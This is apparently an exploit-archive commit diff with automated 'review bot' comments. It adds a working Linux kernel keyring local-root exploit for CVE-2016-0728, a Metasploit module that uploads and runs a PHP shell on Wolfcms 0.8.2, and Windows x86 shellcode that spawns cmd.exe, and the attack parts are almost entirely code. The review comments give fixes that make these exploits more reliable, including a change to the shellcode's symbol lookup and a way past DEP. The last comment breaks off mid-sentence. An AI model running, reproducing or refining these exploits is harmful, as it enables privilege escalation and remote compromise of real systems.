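Review bot: The usage comment kept on the new side, `/* $ ./cve_2016_072 PP_KEY */`, names a binary that the line directly above it does not produce (`-o cve_2016_0728`); the typo was already in the removed text, but this rewrite of the header was the moment to correct it to `/* $ ./cve_2016_0728 PP_KEY */`. The `#include` lines that appear here without header names are presumably the page rendering dropping the angle-bracket tokens rather than a change in the file, but that is worth confirming against the raw blob since the new side of this hunk is otherwise the only header documentation left. The hunk begins inside the file's leading block comment, so its opening lines are not visible here.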
@@ -30,183 +28,143 @@ _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; #define STRUCT_LEN (0xb8 - 0x30) -#define COMMIT_CREDS_ADDR (0xffffffff810bb050) -#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) +#define COMMIT_CREDS_ADDR (0xffffffff81094250) +#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550) struct key_type { char * name; - size_t datalen; - void * vet_description; - void * preparse; - void * free_preparse; - void * instantiate; - void * update; - void * match_preparse; - void * match_free; - void * revoke; - void * destroy; + size_t datalen; + void * vet_description; + void * preparse; + void * free_preparse; + void * instantiate; + void * update; + void * match_preparse; + void * match_free; + void * revoke; + void * destroy; }; -/* thanks spender - Federico Bento */ -static unsigned long get_kernel_sym(char *name) -{ - FILE *f; - unsigned long addr; - char dummy; - char sname[256]; - int ret; - - f = fopen("/proc/kallsyms", "r"); - if (f == NULL) { - fprintf(stdout, "Unable to obtain symbol listing!\n"); - exit(0); - } - - ret = 0; - while(ret != EOF) { - ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); - if (ret == 0) { - fscanf(f, "%s\n", sname); - continue; - } - if (!strcmp(name, sname)) { - fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr); - fclose(f); - return addr; - } - } - - fclose(f); - return 0; -} - void userspace_revoke(void * key) { - commit_creds(prepare_kernel_cred(0)); + commit_creds(prepare_kernel_cred(0)); } int main(int argc, const char *argv[]) { - const char *keyring_name; - size_t i = 0; - unsigned long int l = 0x100000000/2; - key_serial_t serial = -1; - pid_t pid = -1; - struct key_type * my_key_type = NULL; + const char *keyring_name; + size_t i = 0; + unsigned long int l = 0x100000000/2; + key_serial_t serial = -1; + pid_t pid = -1; + struct key_type * my_key_type = NULL; + +struct { long mtype; + char mtext[STRUCT_LEN]; + } msg = {0x4141414141414141, {0}}; + int msqid; 
- struct { - long mtype; - char mtext[STRUCT_LEN]; - } msg = {0x4141414141414141, {0}}; - int msqid; + if (argc != 2) { + puts("usage: ./keys "); + return 1; + } - if (argc != 2) { - puts("usage: ./keys "); - return 1; + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + commit_creds = (_commit_creds) COMMIT_CREDS_ADDR; + prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR; + + my_key_type = malloc(sizeof(*my_key_type)); + + my_key_type->revoke = (void*)userspace_revoke; + memset(msg.mtext, 'A', sizeof(msg.mtext)); + + // key->uid + *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ + //key->perm + *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; + + //key->type + *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; + + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); } - printf("[+] uid=%d, euid=%d\n", getuid(), geteuid()); - commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); - prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); - if(commit_creds == NULL || prepare_kernel_cred == NULL) { - commit_creds = (_commit_creds)COMMIT_CREDS_ADDR; - prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; - if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) - puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source"); + keyring_name = argv[1]; + + /* Set the new session keyring before we start */ + + serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); + if (serial < 0) { + perror("keyctl"); + return -1; + } + + if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { + perror("keyctl"); + return -1; + } + + + puts("Increfing..."); + for (i = 1; i < 0xfffffffd; i++) { + if (i == (0xffffffff - l)) { + l = l/2; + sleep(5); + } + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + 
perror("keyctl"); + return -1; + } + } + sleep(5); + /* here we are going to leak the last references to overflow */ + for (i=0; i<5; ++i) { + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("keyctl"); + return -1; + } } - my_key_type = malloc(sizeof(*my_key_type)); + puts("finished increfing"); + puts("forking..."); + /* allocate msg struct in the kernel rewriting the freed keyring object */ + for (i=0; i<64; i++) { + pid = fork(); + if (pid == -1) { + perror("fork"); + return -1; + } - my_key_type->revoke = (void*)userspace_revoke; - memset(msg.mtext, 'A', sizeof(msg.mtext)); - - // key->uid - *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ - //key->perm - *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; - - //key->type - *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; - - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("msgget"); + if (pid == 0) { + sleep(2); + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + for (i = 0; i < 64; i++) { + if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { + perror("msgsnd"); + exit(1); + } + } + sleep(-1); exit(1); } + } + + puts("finished forking"); + sleep(5); - keyring_name = argv[1]; - - /* Set the new session keyring before we start */ - - serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); - if (serial < 0) { - perror("keyctl"); - return -1; - } - - if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { - perror("keyctl"); - return -1; + /* call userspace_revoke from kernel */ + puts("caling revoke..."); + if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { + perror("keyctl_revoke"); } + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + execl("/bin/sh", "/bin/sh", NULL); - puts("[+] Increfing..."); - for (i = 1; i < 0xfffffffd; i++) { - if (i == (0xffffffff - l)) { - l = l/2; - sleep(5); - } - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - 
perror("[-] keyctl"); - return -1; - } - } - sleep(5); - /* here we are going to leak the last references to overflow */ - for (i=0; i<5; ++i) { - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - perror("[-] keyctl"); - return -1; - } - } - - puts("[+] Finished increfing"); - puts("[+] Forking..."); - /* allocate msg struct in the kernel rewriting the freed keyring object */ - for (i=0; i<64; i++) { - pid = fork(); - if (pid == -1) { - perror("[-] fork"); - return -1; - } - - if (pid == 0) { - sleep(2); - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("[-] msgget"); - exit(1); - } - for (i = 0; i < 64; i++) { - if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { - perror("[-] msgsnd"); - exit(1); - } - } - sleep(-1); - exit(1); - } - } - - puts("[+] Finished forking"); - sleep(5); - - /* call userspace_revoke from kernel */ - puts("[+] Caling revoke..."); - if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { - perror("[+] keyctl_revoke"); - } - - printf("uid=%d, euid=%d\n", getuid(), geteuid()); - execl("/bin/sh", "/bin/sh", NULL); - - return 0; + return 0; } \ No newline at end of file diff --git a/platforms/linux/local/40003.c b/platforms/linux/local/40003.c new file mode 100755 index 000000000..bcee599b4 --- /dev/null +++ b/platforms/linux/local/40003.c 
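Review bot: `puts("usage: ./keys ");` on the new side prints no placeholder for the argument that `argc != 2` demands, and the `./keys` name does not match the `cve_2016_0728` binary the header comment in the previous hunk tells the reader to build; as shown here the placeholder may simply have been stripped by the page rendering, so confirm against the raw file, and if it is really absent `puts("usage: ./cve_2016_0728 <keyring_name>");` fixes both. `sleep(-1);` in the forked children works only through the implicit conversion of -1 to `unsigned int`; `pause();` states the intent without relying on that. Most of this hunk is a re-indentation of lines that are otherwise unchanged, which buries the one functional change (the `/proc/kallsyms` lookup is dropped in favour of the two fixed `#define` addresses) — a whitespace-only commit first would have kept that reviewable. The hunk contains the whole of main(), including the closing brace flagged with "No newline at end of file".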
@@ -0,0 +1,212 @@
+/*
+# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
+# Date: 19/1/2016
+# Exploit Author: Perception Point Team
+# CVE : CVE-2016-0728
+*/
+
+/* CVE-2016-0728 local root exploit
+ modified by Federico Bento to read kernel symbols from /proc/kallsyms
+ props to grsecurity/PaX for preventing this in so many ways
+
+ $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
+ $ ./cve_2016_072 PP_KEY */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+
+#define STRUCT_LEN (0xb8 - 0x30)
+#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
+#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)
+
+
+
+struct key_type {
+ char * name;
+ size_t datalen;
+ void * vet_description;
+ void * preparse;
+ void * free_preparse;
+ void * instantiate;
+ void * update;
+ void * match_preparse;
+ void * match_free;
+ void * revoke;
+ void * destroy;
+};
+
+/* thanks spender - Federico Bento */
+static unsigned long get_kernel_sym(char *name)
+{
+ FILE *f;
+ unsigned long addr;
+ char dummy;
+ char sname[256];
+ int ret;
+
+ f = fopen("/proc/kallsyms", "r");
+ if (f == NULL) {
+ fprintf(stdout, "Unable to obtain symbol listing!\n");
+ exit(0);
+ }
+
+ ret = 0;
+ while(ret != EOF) {
+ ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+ if (ret == 0) {
+ fscanf(f, "%s\n", sname);
+ continue;
+ }
+ if (!strcmp(name, sname)) {
+ fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
+ fclose(f);
+ return addr;
+ }
+ }
+
+ fclose(f);
+ return 0;
+}
+
+void userspace_revoke(void * key) {
+ commit_creds(prepare_kernel_cred(0));
+}
+
+int main(int argc, const char *argv[]) {
+ const char *keyring_name;
+ size_t i = 0;
+ unsigned long int l = 0x100000000/2;
+ key_serial_t serial = -1;
+ pid_t pid = -1;
+ struct key_type * my_key_type = NULL;
+
+ struct {
+ long mtype;
+ char mtext[STRUCT_LEN];
+ } msg = {0x4141414141414141, {0}};
+ int msqid;
+
+ if (argc != 2) {
+ puts("usage: ./keys ");
+ return 1;
+ }
+
+ printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
+ commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
+ prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
+ if(commit_creds == NULL || prepare_kernel_cred == NULL) {
+ commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
+ prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
+ if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
+ puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source");
+ }
+
+ my_key_type = malloc(sizeof(*my_key_type));
+
+ my_key_type->revoke = (void*)userspace_revoke;
+ memset(msg.mtext, 'A', sizeof(msg.mtext));
+
+ // key->uid
+ *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
+ //key->perm
+ *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
+
+ //key->type
+ *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
+
+ if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
+ perror("msgget");
+ exit(1);
+ }
+
+ keyring_name = argv[1];
+
+ /* Set the new session keyring before we start */
+
+ serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
+ if (serial < 0) {
+ perror("keyctl");
+ return -1;
+ }
+
+ if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
+ perror("keyctl");
+ return -1;
+ }
+
+
+ puts("[+] Increfing...");
+ for (i = 1; i < 0xfffffffd; i++) {
+ if (i == (0xffffffff - l)) {
+ l = l/2;
+ sleep(5);
+ }
+ if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
+ perror("[-] keyctl");
+ return -1;
+ }
+ }
+ sleep(5);
+ /* here we are going to leak the last references to overflow */
+ for (i=0; i<5; ++i) {
+ if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
+ perror("[-] keyctl");
+ return -1;
+ }
+ }
+
+ puts("[+] Finished increfing");
+ puts("[+] Forking...");
+ /* allocate msg struct in the kernel rewriting the freed keyring object */
+ for (i=0; i<64; i++) {
+ pid = fork();
+ if (pid == -1) {
+ perror("[-] fork");
+ return -1;
+ }
+
+ if (pid == 0) {
+ sleep(2);
+ if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
+ perror("[-] msgget");
+ exit(1);
+ }
+ for (i = 0; i < 64; i++) {
+ if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
+ perror("[-] msgsnd");
+ exit(1);
+ }
+ }
+ sleep(-1);
+ exit(1);
+ }
+ }
+
+ puts("[+] Finished forking");
+ sleep(5);
+
+ /* call userspace_revoke from kernel */
+ puts("[+] Caling revoke...");
+ if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
+ perror("[+] keyctl_revoke");
+ }
+
+ printf("uid=%d, euid=%d\n", getuid(), geteuid());
+ execl("/bin/sh", "/bin/sh", NULL);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/php/remote/40004.rb b/platforms/php/remote/40004.rb
new file mode 100755
index 000000000..c437b6ee3
--- /dev/null
+++ b/platforms/php/remote/40004.rb
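Review bot: The symbol fallback in main() cannot notice its own failure: when get_kernel_sym() returns 0 (unreadable /proc/kallsyms, or addresses zeroed by kptr_restrict) the code substitutes COMMIT_CREDS_ADDR and PREPARE_KERNEL_CREDS_ADDR and then compares them against the very same two constants, so the "probably need to change" warning prints on every fallback and the run continues with addresses measured on one particular kernel. Those pointers are invoked from kernel context through userspace_revoke(), so a wrong guess will more likely crash the target than fail cleanly; the tautological check should become a hard stop such as `fputs("[-] could not resolve commit_creds/prepare_kernel_cred; fix the *_ADDR defines for this kernel\n", stderr); return 1;` unless the user has deliberately patched the defines. `*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */` hard-codes uid 1000 although the comment promises geteuid(), so for any other unprivileged uid the forged key->uid will not be the caller's; `getuid()` matches the stated intent. The usage string `puts("usage: ./keys ");`, the header line `$ ./cve_2016_072 PP_KEY` and the header-less `#include` lines look truncated in this listing (placeholder argument, trailing digit and header names missing).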
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize
+ super(
+ 'Name' => 'Wolfcms 0.8.2 Arbitrary PHP File Upload Vulnerability',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability in Wolfcms
+ version 0.8.2. This application has an upload feature that
+ allows an authenticated user with administrator roles to upload
+ arbitrary files to the '/public' directory.
+ },
+ 'Author' => [
+ 'Narendra Bhati', # Proof of concept
+ 'Rahmat Nurfauzi' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2015-6568'],
+ ['CVE', '2015-6567'],
+ ['OSVDB','126852'],
+ ['EDB', '38000'],
+ ],
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['Wolfcms <= 0.8.2', {}]
+ ],
+ 'DisclosureDate' => 'Aug 28 2015',
+ 'Privileged' => false,
+ 'DefaultTarget' => 0
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to wolfcms', '/wolfcms']),
+ OptString.new('USER', [true, 'User to login with', '']),
+ OptString.new('PASS', [true, 'Password to login with', '']),
+ ], self.class)
+ end
+
+ def login
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, "/?/admin/login/login/"),
+ 'vars_post' => {
+ "login[username]" => datastore['USER'],
+ "login[password]" => datastore['PASS'],
+ "login[redirect]" => "/wolfcms/?/admin"
+ }
+ })
+ return res
+ end
+
+ def exploit
+
+ upload_name = rand_text_alpha(5 + rand(5)) + '.php'
+
+ get_cookie = login.get_cookies
+ cookie = get_cookie.split(";")[3]
+
+ token = send_request_cgi({
+ 'method' => 'GET',
+ 'cookie' => cookie,
+ 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/browse/")
+ })
+
+ html = token.body
+
if html =~ /Files/ + print_status("Login successfuly") + end + csrf_token = html.scan(/ 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + boundary, + 'Cookie' => cookie, + }, + 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/upload/") + }) + + register_file_for_cleanup(upload_name) + + print_status("#{peer} - Executing shell...") + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "public",upload_name), + }) + + end +end \ No newline at end of file diff --git a/platforms/win32/shellcode/40005.c b/platforms/win32/shellcode/40005.c new file mode 100755 index 000000000..0779cd475 --- /dev/null +++ b/platforms/win32/shellcode/40005.c 
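Review bot: exploit() never verifies that login() worked: `get_cookie = login.get_cookies` raises NoMethodError on a nil response, `cookie = get_cookie.split(";")[3]` selects the fourth cookie fragment purely by position, and the `if html =~ /Files/` block only prints on success and still proceeds to the upload when the marker is absent. Guard the response with `res = login; fail_with(Failure::Unreachable, 'No response from target') unless res`, send `res.get_cookies` as a whole instead of indexing into it, and turn the print-only check into `fail_with(Failure::NoAccess, 'Login failed - check USER/PASS') unless html =~ /Files/`. `"login[redirect]" => "/wolfcms/?/admin"` also hard-codes the default TARGETURI, so an install under another path presumably gets a wrong redirect; `normalize_uri(target_uri, '/?/admin')` follows the rest of the module. The text between `html.scan(/` and `'POST',` is missing from this listing, so the CSRF-token regex and the multipart body that `data` is built from cannot be reviewed here.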
@@ -0,0 +1,273 @@
+/*
+
+ # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode
+ # Date : 22-06-2016
+ # Author : Roziul Hasan Khan Shifat
+ # Tested on : Windows 7,10 x86
+
+*/
+
+
+/*
+
+section .text
+ global _start
+_start:
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;EAX=PEB
+mov eax,[eax+0xc] ;EAX=PEB->Ldr
+mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList
+lodsd ; EAX=ntdll.dll
+xchg eax,esi ;EAX=ESI , ESI=EAX
+lodsd ; EAX=Third(kernel32)
+mov ebx,[eax+0x10] ;PVOID Dllbase (base address)
+
+;-------------------------------
+
+mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
+add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header
+mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress
+add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY)
+mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
+add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames
+xor ecx,ecx
+;-----------------------
+
+Get_func:
+inc ecx ;increment the ordinal
+lodsd ;Get name offset
+add eax,ebx ;(offset+kernel32.dll base adress)=Get function name
+cmp dword [eax],0x50746547 ;GetP
+jnz Get_func
+cmp dword [eax+0x4],0x41636f72 ;rocA
+jnz Get_func
+cmp dword [eax+0x8],0x65726464 ;ddre
+jnz Get_func
+
+;---------------------
+
+mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals
+
+add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
+
+mov cx,[esi+ecx*2] ;CX=Number of Function
+dec ecx
+mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
+
+add esi,ebx ;ESI=beginning of Address table
+mov edx,[esi+ecx*4];EDX=Pointer(offset)
+add edx,ebx ;Edx=GetProcAddress
+
+;-----------------------------
+xor esi,esi
+mov esi,edx ;backup of GetProcAddress
+xor edi,edi
+mov edi,ebx
+;--------------
+
+;finding address of LoadLibraryA()
+xor ecx,ecx
+push ecx
+
+push 0x41797261 +push 0x7262694c +push 0x64616f4c + +push esp +push ebx ;address of kernel32.dll + +call edx + +add esp,12 +;----------------- +xor ecx,ecx +;finding address of ExitProcess +push 0x42737365 +mov [esp+3],cl +push 0x636f7250 +push 0x74697845 +push esp +push edi +xor edi,edi +mov edi,eax +call esi + +;---------------------------- +add esp,12 +;LoadLibraryA("shell32.dll") +xor ecx,ecx +push ecx +push 0x416c6c64 +mov [esp+3],cl +push 0x2e32336c +push 0x6c656873 + +push esp +xor edx,edx +mov edx,edi ;Edx=LoadLibraryA +mov edi,eax ;edi=ExitProcess +call edx +add esp,11 +;------------------ + +;finding address of ShellExecuteA() +xor ecx,ecx +push 0x42424241 +mov [esp+1],cl + +push 0x65747563 +push 0x6578456c +push 0x6c656853 + +push esp +push eax + +call esi +;------------------- +;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1); +add esp,13 +xor ecx,ecx +push 0x41657865 +mov [esp+3],cl +push 0x2e646d63 + +push esp +pop ecx + + +xor edx,edx +inc edx + +push edx +xor edx,edx +push edx +push edx + +push ecx +push edx +push edx + +call eax + +call edi + +*/ + + +/* + +Disassembly of section .text: + +00401000 <_start>: + 401000: 31 c9 xor %ecx,%ecx + 401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 401006: 8b 40 0c mov 0xc(%eax),%eax + 401009: 8b 70 14 mov 0x14(%eax),%esi + 40100c: ad lods %ds:(%esi),%eax + 40100d: 96 xchg %eax,%esi + 40100e: ad lods %ds:(%esi),%eax + 40100f: 8b 58 10 mov 0x10(%eax),%ebx + 401012: 8b 53 3c mov 0x3c(%ebx),%edx + 401015: 01 da add %ebx,%edx + 401017: 8b 52 78 mov 0x78(%edx),%edx + 40101a: 01 da add %ebx,%edx + 40101c: 8b 72 20 mov 0x20(%edx),%esi + 40101f: 01 de add %ebx,%esi + 401021: 31 c9 xor %ecx,%ecx + +00401023 : + 401023: 41 inc %ecx + 401024: ad lods %ds:(%esi),%eax + 401025: 01 d8 add %ebx,%eax + 401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 40102d: 75 f4 jne 401023 + 40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 401036: 75 eb jne 401023 + 401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 40103f: 
75 e2 jne 401023 + 401041: 8b 72 24 mov 0x24(%edx),%esi + 401044: 01 de add %ebx,%esi + 401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx + 40104a: 49 dec %ecx + 40104b: 8b 72 1c mov 0x1c(%edx),%esi + 40104e: 01 de add %ebx,%esi + 401050: 8b 14 8e mov (%esi,%ecx,4),%edx + 401053: 01 da add %ebx,%edx + 401055: 31 f6 xor %esi,%esi + 401057: 89 d6 mov %edx,%esi + 401059: 31 ff xor %edi,%edi + 40105b: 89 df mov %ebx,%edi + 40105d: 31 c9 xor %ecx,%ecx + 40105f: 51 push %ecx + 401060: 68 61 72 79 41 push $0x41797261 + 401065: 68 4c 69 62 72 push $0x7262694c + 40106a: 68 4c 6f 61 64 push $0x64616f4c + 40106f: 54 push %esp + 401070: 53 push %ebx + 401071: ff d2 call *%edx + 401073: 83 c4 0c add $0xc,%esp + 401076: 31 c9 xor %ecx,%ecx + 401078: 68 65 73 73 42 push $0x42737365 + 40107d: 88 4c 24 03 mov %cl,0x3(%esp) + 401081: 68 50 72 6f 63 push $0x636f7250 + 401086: 68 45 78 69 74 push $0x74697845 + 40108b: 54 push %esp + 40108c: 57 push %edi + 40108d: 31 ff xor %edi,%edi + 40108f: 89 c7 mov %eax,%edi + 401091: ff d6 call *%esi + 401093: 83 c4 0c add $0xc,%esp + 401096: 31 c9 xor %ecx,%ecx + 401098: 51 push %ecx + 401099: 68 64 6c 6c 41 push $0x416c6c64 + 40109e: 88 4c 24 03 mov %cl,0x3(%esp) + 4010a2: 68 6c 33 32 2e push $0x2e32336c + 4010a7: 68 73 68 65 6c push $0x6c656873 + 4010ac: 54 push %esp + 4010ad: 31 d2 xor %edx,%edx + 4010af: 89 fa mov %edi,%edx + 4010b1: 89 c7 mov %eax,%edi + 4010b3: ff d2 call *%edx + 4010b5: 83 c4 0b add $0xb,%esp + 4010b8: 31 c9 xor %ecx,%ecx + 4010ba: 68 41 42 42 42 push $0x42424241 + 4010bf: 88 4c 24 01 mov %cl,0x1(%esp) + 4010c3: 68 63 75 74 65 push $0x65747563 + 4010c8: 68 6c 45 78 65 push $0x6578456c + 4010cd: 68 53 68 65 6c push $0x6c656853 + 4010d2: 54 push %esp + 4010d3: 50 push %eax + 4010d4: ff d6 call *%esi + 4010d6: 83 c4 0d add $0xd,%esp + 4010d9: 31 c9 xor %ecx,%ecx + 4010db: 68 65 78 65 41 push $0x41657865 + 4010e0: 88 4c 24 03 mov %cl,0x3(%esp) + 4010e4: 68 63 6d 64 2e push $0x2e646d63 + 4010e9: 54 push %esp + 4010ea: 59 pop %ecx + 
4010eb: 31 d2 xor %edx,%edx + 4010ed: 42 inc %edx + 4010ee: 52 push %edx + 4010ef: 31 d2 xor %edx,%edx + 4010f1: 52 push %edx + 4010f2: 52 push %edx + 4010f3: 51 push %ecx + 4010f4: 52 push %edx + 4010f5: 52 push %edx + 4010f6: ff d0 call *%eax + 4010f8: ff d7 call *%edi + +*/ + + +#include +#include +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7"; + +main() +{ +printf("shellcode length %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/win64/remote/39999.rb b/platforms/win64/remote/39999.rb new file mode 100755 index 000000000..a22d3ac16 --- /dev/null +++ b/platforms/win64/remote/39999.rb 
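Review bot: The export-name walk resolves the ordinal one entry late: Get_func does `inc ecx` before each `lodsd`, so at the match ecx is the 1-based name index, and `mov cx,[esi+ecx*2]` therefore loads AddressOfNameOrdinals[k+1] while the following `dec ecx` subtracts one from that ordinal rather than from the index. It appears to land on GetProcAddress only because the export sorted right after it in kernel32 happens to carry the next consecutive ordinal, which is a property of that DLL's layout rather than of the PE format; swapping the two lines to `dec ecx` followed by `mov cx,[esi+ecx*2]` makes the lookup correct (the byte string and the disassembly then need regenerating). The harness `(* (int(*)()) shellcode) ();` calls into a writable `.data` array, which DEP on the Windows 7/10 targets named in the header will typically refuse unless the buffer is first made executable (VirtualAlloc/VirtualProtect with PAGE_EXECUTE_READWRITE) or the binary is linked without NX support; a comment stating that 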